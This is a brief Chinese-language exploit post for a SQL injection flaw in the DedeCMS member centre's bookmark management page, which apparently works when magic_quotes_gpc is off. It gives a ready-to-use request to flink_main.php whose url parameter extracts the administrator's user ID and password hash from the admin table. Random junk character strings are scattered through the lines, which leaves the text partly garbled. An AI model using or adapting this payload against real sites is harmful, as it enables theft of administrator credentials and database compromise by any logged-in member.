DedeCMS会员中心SQL注射漏洞0 e( P" o0 s7 Z" f2 _" J
需要magic_quotes_gpc = Off+ q/ R ]; ^) w; i$ ?3 e
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.) Z* e+ F0 k- x, J4 \" N% _" R* J
( |" d; T: W. M4 V1 g% k
DedeCMS会员中心书签管理SQL注射漏洞
; g) e) T2 v# m, ]% ~成功利用该漏洞可获得管理员密码
/ n& A$ o# Y: {6 C8 b* V' A1 V * j1 u2 O: I- B: A
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
5 C; g: j4 t& A6 i4 k- F, [" F ; I: T8 ?0 G1 Y& M. {# q3 e
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
* K/ r) r" k" \! a |